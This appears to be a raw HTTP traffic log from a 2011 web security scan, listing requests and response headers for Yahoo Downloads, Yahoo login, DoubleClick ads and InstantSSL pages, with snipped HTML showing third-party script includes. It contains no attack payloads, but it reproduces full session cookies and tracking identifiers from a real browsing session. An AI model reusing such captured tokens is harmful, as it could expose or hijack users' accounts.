LO=AAAAAQAUYn__ZmG8acLIZhvDLvm3d2V86m4BAHVzYTt2dDs1MjM7c3Rvd2U7MDU2NzI7c29mdGxheWVyIHRlY2hub2xvZ2llcyBpbmMuO2Jyb2FkYmFuZDsxNzMuMTkzLjIxNC4yNDM-; UA=AAAAAQAUxOdW3WQldyr.xNlqt1dY_m2yKF0DA3gBY2BgEGFg6lzCwJLdysDI.4OB4YYrAwMDJwMDo34vxzZvqFwLUO4nUM4NIefSj0uuIzvmFE65JLfrOOUivK7hlPObEIJTzrWBAyrXBnTnd6A7XWDu7JBwv41Tn4SdNi597Sd3bsKlr_3kjFqccieEF.OUO7bgEU65o18FccrNWMCOW862Fafc9IeeuOU6VuKWM9XFKTftpiIwbBlxyld2CwHlGXy37Gxg4AAmpJ2MjIwMDIG3GJmBFIMBE4MIiK9gBhZeWgAWZslkZAMKsoQwsTGyAxnyu5gYuEHKwGnQB2QeAwMAUdqQwA--
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: UA=AAAAAQAUKF.3vTpKG5CpzwVpYH3m5EI9n_UDA3gBY2BgEGFg6lzCwJLdzMDI.4uB4YY7AwMDJwMDo_4k_VhlqFwrUO4HUM4VJtfLsc0bKtcClPsJlHNDyLn045LryI45hVMuye06TrkIr2s45fwmhOCUc23ggMq1Ad35HehOF5g7OyTcb.PUJ2GnjUtf.8mdm3Dpaz85oxan3AnhxTjlji14hFPu6FdBnHIzFrDjlrNtxSk3_aEnbrmOlbjlTHWB4ceIU76yWwgoz.C7jZuBgQOYkHYyMjEyMATeYmQBUgwGzAwijGARBTMwtbQALMGSycgOlGcJYWJn5AAy5HcxM3BBFELTIchQBgBQFY53; Domain=.amgdgt.com; Expires=Thu, 26-May-2011 14:21:08 GMT; Path=/ Expires: Thu, 01 Jan 1970 00:00:01 GMT Cache-Control: no-cache, no-store P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/javascript;charset=UTF-8 Content-Length: 3896 Date: Tue, 26 Apr 2011 14:21:07 GMT
GET /freeware HTTP/1.1 Host: downloads.yahoo.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: B=8khj7j56qmjsh&b=3&s=7r; F=a=I9dRHdwMvTUKaBDhiVaH.UVtn.V7Y30KdDQIYBG7obdok_NZIfFNBlUZT4rlwq78V5tRt3I-&b=WFvT; YLS=v=1&p=1&n=9; __utmz=143065248.1303826118.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=143065248.1215139530.1303826118.1303826118.1303826118.1; __utmc=143065248; __utmb=143065248.2.10.1303826118
Response
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 13:56:11 GMT P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" Set-Cookie: ysf=ciGdOSjH5xepaEAZS7QpAXfv98cK6F6KOcKtFsBL.zOIPQE4N3EHjPIjz9Ry0.pA_mhV2n7Jk1hw5pekH26vxKFtU5TRQQAma.hL037jgYa2PTX1V1toVMBQkwW0dgg4DfLPDcclwS0d8ZIiLUS.dMq6ZSeg6uvseIjSVaAzLU0vfSpRvMWxH3gKjA0C54a3RHQpbUeTZGL.yJk2WBR1MFBu8yCip521Ptzsm3Z3mlh3zMyVSofOpA.FJ1kwjgCkS1.NbzkgfKrwT2snB9ZepFddS4yfxXfIfiHs2KuE5RpdCYPYEjZWj4_uTK0IIeFNkv4kq82BDTkvDFePKHRvIjb9FO9fe1TrqhEzPiHz4Ap7wCfx0gOIInDXzvX_fNtQ66cXT7EGRJj4MJTsvQnxVuKHG3ztG8Lw3MufNM2i3lGi9VFA; expires=Thu, 26-Apr-2012 13:56:11 GMT; path=/; domain=.yahoo.com; secure; httponly Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Cache-Control: private Content-Length: 141230
GET /linux HTTP/1.1 Host: downloads.yahoo.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: B=8khj7j56qmjsh&b=3&s=7r; F=a=I9dRHdwMvTUKaBDhiVaH.UVtn.V7Y30KdDQIYBG7obdok_NZIfFNBlUZT4rlwq78V5tRt3I-&b=WFvT; YLS=v=1&p=1&n=9; __utmz=143065248.1303826118.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=143065248.1215139530.1303826118.1303826118.1303826118.1; __utmc=143065248; __utmb=143065248.4.10.1303826118
Response
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 13:56:13 GMT P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" Set-Cookie: ysf=EJrvAC_B5xevrWgM3QJ9810zR4MY0ALwmL67RvYl4ACCDjj91C5QOzAKojsZVGh5deEI1hSA5VaAJUGx17h82kxoBREydbHnor1ILXmEa8wQ5wzN4VHUV6V83C2a4vsDlIosvXogdOWwmx_MnZKukNzYDLWMg3cz66FITnSnPasy1PL_qQgGs9MMdNFdMWD3boAma3XgVE4SSncKTsuYqyQkIpbMi0sZwzc3YWz07HQaL46euEfKCnnb3Vp2oCFQ5OhdtsKrJrpYOwni9u.OO4JPbknkKFpXwZGfRKqX89yug3H5GXRn_bVK1PCeOhc9M77MfjEAXiw3Y.bA7l1DQPwqaOuGRgNhxArHn7_uk._qc8vt2PpgQbMH0c51CO5tYMJBZNSpchj9e2AdYWohceMZKPxW4fzLDSBVQDqvHJZtbvVVR0TXENX_l0xFuFKDiVkkWI9_gMeWuGenxxyVzA--; expires=Thu, 26-Apr-2012 13:56:13 GMT; path=/; domain=.yahoo.com; secure; httponly Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Cache-Control: private Content-Length: 142705
GET /mobile HTTP/1.1 Host: downloads.yahoo.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: B=8khj7j56qmjsh&b=3&s=7r; F=a=I9dRHdwMvTUKaBDhiVaH.UVtn.V7Y30KdDQIYBG7obdok_NZIfFNBlUZT4rlwq78V5tRt3I-&b=WFvT; YLS=v=1&p=1&n=9; __utmz=143065248.1303826118.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=143065248.1215139530.1303826118.1303826118.1303826118.1; __utmc=143065248; __utmb=143065248.2.10.1303826118
Response
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 13:56:10 GMT P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" Set-Cookie: ysf=ofsOP8_H5xf895sWJTCd9NPX2WiBuAc7uOvkNKmiqCXeWEXt.5JJWgRWZ9jRCPYcB.3vOD1FfeTkx2jdWqUGZbqFFXzykG6SA7UxMAU82b.01IZHxh0tUWHBSA3n08efIw5qaM.ffg_vbq43qjMIBnKcfstPxGYOZcSggnL9TxHDcjJ99GtFQgcbtUEKHZ1fkIYxEusvCPp5bZI2.hOew2fKIIGI7w3CfeReG2Xu0Jmwi2fC.YchFzGWPWI_5nw6.BAzmBaXNJzz1bTr_DCy3SBGCT2DMn5D9G5JqZo4Bk6fX3Zs8Ojdpl3j7hTM5FYBdvx0VLNcFZIlOk3YrQseMxae8MRhopUnUtatVlbI4Cw5uUpj9CdikjKLeE..9R.KaGNmB9SQK_ZHdck_Ehxl_u7ZgNaW3APHvrcnb6Mx.gKKcB2XDQ2zCgx9JqmWKlWIWQC0YYBolBMwV8OqqN_iTuqnQw--; expires=Thu, 26-Apr-2012 13:56:11 GMT; path=/; domain=.yahoo.com; secure; httponly Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Cache-Control: private Content-Length: 178981
GET /windows HTTP/1.1 Host: downloads.yahoo.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: B=8khj7j56qmjsh&b=3&s=7r; F=a=I9dRHdwMvTUKaBDhiVaH.UVtn.V7Y30KdDQIYBG7obdok_NZIfFNBlUZT4rlwq78V5tRt3I-&b=WFvT; YLS=v=1&p=1&n=9
Response
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 13:55:05 GMT P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" Set-Cookie: ysf=e8hh476F5xfram8esL9uYMWUer4zVxwF9yCpDgtNY8OnYb8LD_SWa8_QLi9Zf_nIYdYzjXelUkLDzTd5b41mR1CxNhgLDeJHDzqdTA_eLB7_NzCP6Wp5J1nax6Fl7C53FlKTK3X2PDvsCY9f.C1X.bicPXpRyIP_cyXm9eGIvbxyykLRurMSQU0VWvd3X.Tvtb1_oT5ZxXajuPqdaGAOb.b4OXS02AtBEoLtP8RSAc2QL5O1mGGB9hINfdet0aGd3veAMcHbDG7KEhy9HwTlfx0IL8zE_mS3HW73sFhGOULomyXVqu3GnA4nTOqCY5E7M9MNb5RaoFPByjFgTjNrs8iFjmWFIq4uMdc5dBmcxooGV6f6fzOs87bsA3pt9yGcct.ODumZ3Gkqhu0IB.Pzes_Ys1kYrxNgn55_ms6pdomDxWcr08BuLVK.NLAlaPN3LdWDDu54bs9YvnuaK5ueLURN; expires=Thu, 26-Apr-2012 13:55:05 GMT; path=/; domain=.yahoo.com; secure; httponly Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Cache-Control: private Content-Length: 154354
GET /windows/desktop-enhancements/virtual-desktop HTTP/1.1 Host: downloads.yahoo.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: B=8khj7j56qmjsh&b=3&s=7r; F=a=I9dRHdwMvTUKaBDhiVaH.UVtn.V7Y30KdDQIYBG7obdok_NZIfFNBlUZT4rlwq78V5tRt3I-&b=WFvT; YLS=v=1&p=1&n=9; __utmz=143065248.1303826118.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=143065248.1215139530.1303826118.1303826118.1303826118.1; __utmc=143065248; __utmb=143065248.5.10.1303826118
Response
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 13:56:18 GMT P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" Set-Cookie: ysf=gBH90to.5hf7Z2kPHVVBWT1SOsqA8znkBbhwDbdVtTDNQAnUJ2JU5sMkJoYkXjmm_JAUl0ncpuz70YW7mPjqrr5ij5IC87ycWrraNhzHrC2mTAo.wRnQRi_I2woD3u.f2KbfAH6kMJ3XcTVHbVH9MJO4JykNFL9_jvpCHC34w7ty0OXi4Pw6P1ZtfyiA2rqgVsOo9IS7gEGiiSUxMD5CsPVXKF0Er3.lwl5Vd.1HOfASbde9T7jw1q8ResrnweLIeYCAGyZx6o_IWDaZWAQu45KA.hCdcHthT46btDCeIczGSVK_3rdHcFP1SFrSHLiGSY8AfZyVZLpx3nwHu7IRdhT3coNoydg1kwsAK3uxvwmeQRPkbb4sA8_dGwNKGZvyckTkFHTUrXLQginUrM3tywEckcOI2Ou9oGcFNlOIGnh2m4yIZiLq3dDdRMkuNCmd_55TO55HJyjRYEm3ssZ2jLUS; expires=Thu, 26-Apr-2012 13:56:18 GMT; path=/; domain=.yahoo.com; secure; httponly Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Cache-Control: private Content-Length: 305086
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <META name="y_key" content="f760cc789e48a3df" /> <META name="google-site-verificati ...[SNIP]... <meta name="description" content="Find all the latest Desktop Enhancements downloads from the best software downloads site - download Virtual desktop titles from Yahoo! Downloads" /> <script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/carousel/carousel-min.js&2.8.1/build/yahoo-dom-event/yahoo-dom-event.js&2.8.1/build/animation/animation-min.js&2.8.1/build/container/container_core-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/button/button-min.js&2.8.1/build/menu/menu-min.js&2.8.1/build/element/element-min.js&2.8.1/build/container/container-min.js"></script> <script type="text/javascript" src="http://p.yimg.com/dp/dyc/js/downloads_min_0.0.9.js"></script> ...[SNIP]... </div><script charset="utf-8" type="text/javascript" src="http://l.yimg.com/a/lib/uh/15/js/uh_rsa-1.0.9.js"></script> ...[SNIP]...
GET /windows/is-it/security/anti-virus-scanners/avg-anti-virus-free-edition/42305 HTTP/1.1 Host: downloads.yahoo.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: B=8khj7j56qmjsh&b=3&s=7r; F=a=I9dRHdwMvTUKaBDhiVaH.UVtn.V7Y30KdDQIYBG7obdok_NZIfFNBlUZT4rlwq78V5tRt3I-&b=WFvT; YLS=v=1&p=1&n=9; __utmz=143065248.1303826118.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=143065248.1215139530.1303826118.1303826118.1303826118.1; __utmc=143065248; __utmb=143065248.1.10.1303826118
Response
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 13:56:08 GMT P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" Set-Cookie: ysf=xVd8BADE5xeANwBRYs5oLZOqg_4FZ6HdmpnP3mHJAK3o2rISGx9ISMjk9GKvcBYbrrAA2bDOHJ2MuK3IeVbHlBzoAS.smgIM3E6AVQQ5HGJIhLNu3IGyDfk5N.MvvnFmturIItI.TPOWyGkz9WnhF48GR79QpvqhRWFqwNP4lhdypwAsUqzy.epYzOkReKuzzAE6iVg75mlNK9L5yANHq2dI8uLRAr7WWG9Na.K__YtTRaZvZZ2r.B6gSTAygzYEueDTAy_34EUBdSTpnwgRDwM7EpBWx_BJL1B6_kPaZtES26xDZrRpq18313VM42HISJCsoKFnWDCcWGvIj9Z7EsIHQFaRktpA1DcyxuGrPZDo2jpM7MARGDfNaq17ifUVw9jfHnIhc3T2iPuHjTn6X0RP8GSV.fh1inGa5m24wd3NjtQJYVOxYZIMYnk.70uWmLX2Lg6jF3Q5XVVWfYwHDf7j; expires=Thu, 26-Apr-2012 13:56:08 GMT; path=/; domain=.yahoo.com; secure; httponly Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Cache-Control: private Content-Length: 257732
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <META name="y_key" content="f760cc789e48a3df" /> <META name="google-site-verificati ...[SNIP]... et the latest AVG Anti-Virus Free Edition Genuine and Verified for your Windows. Search and download more Security softwares for Anti-Virus scanners from IS/IT section on Yahoo! Downloads." /> <script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/carousel/carousel-min.js&2.8.1/build/yahoo-dom-event/yahoo-dom-event.js&2.8.1/build/animation/animation-min.js&2.8.1/build/container/container_core-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/button/button-min.js&2.8.1/build/menu/menu-min.js&2.8.1/build/element/element-min.js&2.8.1/build/container/container-min.js"></script> <script type="text/javascript" src="http://p.yimg.com/dp/dyc/js/downloads_min_0.0.9.js"></script> ...[SNIP]... </div><script charset="utf-8" type="text/javascript" src="http://l.yimg.com/a/lib/uh/15/js/uh_rsa-1.0.9.js"></script> ...[SNIP]...
GET /pagead/ads?client=ca-pub-5253809430940410&output=html&h=600&slotname=1644788465&w=120&lmt=1303845665&flash=10.2.154&url=http%3A%2F%2Fwww.spamlaws.com%2Fspam-blocker.html&dt=1303827665898&bpp=8&shv=r20110420&jsv=r20110415&prev_slotnames=8319948044%2C1020003104%2C9565114904%2C0023118579&correlator=1303827663964&frm=0&adk=222637912&ga_vid=902403751.1303827664&ga_sid=1303827664&ga_hid=1845423620&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=965&bih=956&fu=0&ifi=5&dtd=13&xpc=gvNjmv27ZD&p=http%3A//www.spamlaws.com HTTP/1.1 Host: googleads.g.doubleclick.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u
Response
HTTP/1.1 200 OK P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/html; charset=UTF-8 X-Content-Type-Options: nosniff Date: Tue, 26 Apr 2011 14:20:57 GMT Server: cafe Cache-Control: private X-XSS-Protection: 1; mode=block Content-Length: 1722
GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303801106&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2F2011%2F04%2F25%2Fdork%2Flearnbridgefrontcom%2Fdom-based-xss-cross-site-scripting-capec86-cwe-79-dork-ghdb-report-example-poc.html&dt=1303783143017&bpp=6&shv=r20110420&jsv=r20110415&correlator=1303783143025&frm=0&adk=1607234649&ga_vid=2091087362.1303783143&ga_sid=1303783143&ga_hid=1637931588&ga_fc=0&u_tz=-300&u_his=8&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=907&bih=928&fu=0&ifi=1&dtd=17&xpc=5bvonzgYDQ&p=http%3A//xss.cx HTTP/1.1 Host: googleads.g.doubleclick.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u
Response
HTTP/1.1 200 OK P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/html; charset=UTF-8 X-Content-Type-Options: nosniff Date: Tue, 26 Apr 2011 01:58:53 GMT Server: cafe Cache-Control: private X-XSS-Protection: 1; mode=block Content-Length: 12742
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s ...[SNIP]... </script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script> ...[SNIP]...
GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303800256&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2F2011%2F04%2F25%2Fdork%2Freflected-xss-cross-site-scripting-cwe79-capec86-ghdb-wwwgenbookcom.htm&dt=1303782297447&bpp=4&shv=r20110420&jsv=r20110415&correlator=1303782297498&frm=0&adk=1819763764&ga_vid=190606745.1303782298&ga_sid=1303782298&ga_hid=647492866&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=907&bih=928&fu=0&ifi=1&dtd=151&xpc=ZxjtlC7jU7&p=http%3A//xss.cx HTTP/1.1 Host: googleads.g.doubleclick.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u
Response
HTTP/1.1 200 OK P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/html; charset=UTF-8 X-Content-Type-Options: nosniff Date: Tue, 26 Apr 2011 01:44:48 GMT Server: cafe Cache-Control: private X-XSS-Protection: 1; mode=block Content-Length: 4307
GET / HTTP/1.1 Host: learn.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
GET /config/login?.done=http://downloads.yahoo.com%2findex.php&.src=ydl&.intl=us HTTP/1.1 Host: login.yahoo.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: B=8khj7j56qmjsh&b=3&s=7r; F=a=I9dRHdwMvTUKaBDhiVaH.UVtn.V7Y30KdDQIYBG7obdok_NZIfFNBlUZT4rlwq78V5tRt3I-&b=WFvT; YLS=v=1&p=1&n=9; ysf=08QxMuCE5xcRp6XxvP9UqQQVFjUnPTRIkxcDabYECLHYlgjWjedO.aMI9RGj2l09q.GrzSj0ZGNpKWL4tC5RhhHyRxFHPlU.kFCMEd44rNZiy50Es8NrBu7yXU0mNtf0YtrWeEjpo31kxbqrG0YGBvIbxraTXVC9nbjUpNtv9aXJppMZot2l11h5_ZSFAPhtqxX_6SVAEVGb0NKTjuEX9ZYv2zDAxiWP9cGTqFS0cy9sv336lSqBJx7SukerpgGajbVm5ixswV527gxjaF3uyCr7m1vg_4ERgH_kHGmM1GC3lZg7kpdA4se.Qgpe8f7RJkYS8crdx364dtmP6Js16W8_gxE1rMXJs1u9F8J4fm3eQRNc_54_vpkaiaTqfiqOcFZODhj_ghb_GOxG1FWZmW.i2zsaspuKA4yive5ZswfNSY0PlT8WhNaRhUIxTsKui8a4VYdjdz.5HLTMtIko4yhA
Response
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 13:55:23 GMT P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" X-Frame-Options: DENY Cache-Control: private Connection: close Content-Type: text/html Content-Length: 42663
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Sign in ...[SNIP]... </script> <script type="text/javascript" src="https://s.yimg.com/lq/lib/reg/js/yahoo_dom_event_animation_connection_2.8.2_inc_superads_capslock_loginmd5_min_12.js"></script> ...[SNIP]...
function createCookie(name,value,days) { if (days) { var date = new Date(); date.setTime(date.getTime()+(days*24*60*60*1000)); var expires = "; expires="+date.toGMTString(); } else var ...[SNIP]... <div style="position:absolute;right:317px;top:24px;">'); document.write('<script type="text/javascript" src="http://c3.chatsupportlive.com/js/status_image.php?base_url=http://c3.chatsupportlive.com&l=comodo4support&x=78&deptid=190&"><a href="http://www.phplivesupport.com"> ...[SNIP]...
GET / HTTP/1.1 Host: www.instantssl.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Date: Tue, 26 Apr 2011 12:49:54 GMT Content-Type: text/html Connection: close Vary: Accept-Encoding Content-Length: 30428
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>SSL Certificate F ...[SNIP]... <link href="/css/mast_head.css" rel="stylesheet" type="text/css" /> <script type="text/javascript" src="//secure.comodo.com/hostedLogin/sha1.js"></script> ...[SNIP]... </script> <script type="text/javascript" src="//secure.comodo.com/hostedLogin/login.js"></script> ...[SNIP]... </script> <script type="text/javascript" src="//google-analytics.com/urchin.js"></script> ...[SNIP]... <div id="index-news"><script type="text/javascript" src="https://forums.comodo.com/rss.php?i=1&t=1&l=1&n=1&d=1&w=1&url=http://www.comodo.com/rss.xml"></script> ...[SNIP]... </script> <script type="text/javascript" src="//secure.comodo.com/prices.js"></script> ...[SNIP]... <!-- BEGIN HumanTag Monitor. DO NOT MOVE! MUST BE PLACED JUST BEFORE THE /BODY TAG --><script type="text/javascript" src='//server.iad.liveperson.net/hc/61298727/x.js?cmd=file&file=chatScript3&site=61298727&&imageUrl=http://www.instantssl.com/ssl-certificate-images/liveperson/sales'> </script> ...[SNIP]...
GET /ssl-certificate-products/ HTTP/1.1 Host: www.instantssl.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
